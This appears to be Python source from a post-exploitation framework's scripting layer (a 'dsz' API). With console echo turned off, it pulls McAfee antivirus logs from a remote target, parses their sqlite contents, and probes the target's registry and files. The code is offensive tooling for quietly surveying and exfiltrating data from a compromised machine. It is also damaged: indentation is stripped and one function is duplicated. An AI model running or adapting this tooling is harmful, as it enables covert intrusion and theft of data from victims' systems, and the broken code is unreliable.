def querylog(log, name):
dsz.control.echo.Off()
cmd = ('get "%s"' % log)
(suc, cmdid) = dsz.cmd.RunEx(cmd.encode('utf-8'), dsz.RUN_FLAG_RECORD)
dsz.control.echo.On()
if (not suc):
dsz.ui.Echo(('Could not get %s' % log), dsz.ERROR)
response = dsz.ui.Prompt('Would you like to copyget?')
if response:
dsz.control.echo.Off()
cmd = ('copyget "%s"' % log)
(suc, cmdid) = dsz.cmd.RunEx(cmd.encode('utf-8'), dsz.RUN_FLAG_RECORD)
dsz.control.echo.On()
if (not suc):
dsz.ui.Echo(('Could not get %s' % log), dsz.ERROR)
return False
else:
return False
dsz.ui.Echo('Dumping the entire parsed sqlite log to disk and displaying the last 5 entries', dsz.GOOD)
localfile = os.path.join(dsz.script.Env['log_path'], dsz.cmd.data.Get('localgetdirectory::path', dsz.TYPE_STRING, cmdid)[0])
localfile = os.path.join(localfile, dsz.cmd.data.Get('FileLocalName::localname', dsz.TYPE_STRING, cmdid)[0])
outpath = os.path.join(os.path.dirname(localfile), 'NOSEND')
if (not os.path.exists(outpath)):
os.makedirs(outpath)
localOutfile = os.path.join(outpath, 'McAfee Output-{0}.txt'.format(name))
localoutfileObj = open(localOutfile, 'a')
localoutfileObj.write('---------- New Output at {0} ---------\n'.format(datetime.datetime.today()))
dsz.ui.Echo(' Output: {0}'.format(localOutfile), dsz.GOOD)
connLog = sqlite3.connect(localfile)
cLog = connLog.cursor()
cLog.execute('SELECT details_info, action_admin, action_usrname, date, fkey FROM log')
logrows = cLog.fetchall()
i = 0
for row in logrows:
fkey = (row[4],)
cLog.execute('SELECT field_id, data FROM field WHERE fkey=?', fkey)
fields = cLog.fetchall()
try:
out = parseDetails(row, fields)
except:
mcafeelog.critical('Unable to parse this log! See mcafee OPLOGS for more info.', exc_info=True)
break
out += ' ----------------------\n'
if (i > (len(logrows) - 5)):
dsz.ui.Echo(out, dsz.WARNING)
localoutfileObj.write(out)
else:
localoutfileObj.write(out)
i += 1
cLog.close()
def reg_exists(hive, key, value=None, recurse=False):
cmd = (u'registryquery -hive %s -key "%s"' % (hive, key))
if (value is not None):
cmd = (cmd + (u' -value "%s"' % value))
if recurse:
cmd = (cmd + u' -recursive')
cmdStatus = dsz.cmd.RunEx(cmd.encode('utf8'), 0)[0]
if cmdStatus:
return True
else:
return False
def file_exists(path, name):
path = path_normalize(path)
cmd = (u'fileattributes -file "%s\\%s"' % (path, name))
(cmdStatus, cmdId) = dsz.cmd.RunEx(cmd.encode('utf8'), dsz.RUN_FLAG_RECORD)
if cmdStatus:
[attrib_value] = dsz.cmd.data.Get('file::attributes::value',
dsz.TYPE_INT, cmdId)
if (attrib_value > 0):
return True
else:
return False
else:
return False
def runCmd(cmd):
dsz.control.echo.Off()
(suc, cmdid) = dsz.cmd.RunEx(cmd.encode('utf-8'), dsz.RUN_FLAG_RECORD)
dsz.control.echo.On()
return (suc, cmdid)
def runCmd(cmd):
dsz.control.echo.Off()
(suc, cmdid) = dsz.cmd.RunEx(cmd.encode('utf-8'), dsz.RUN_FLAG_RECORD)
dsz.control.echo.On()
return (suc, cmdid)
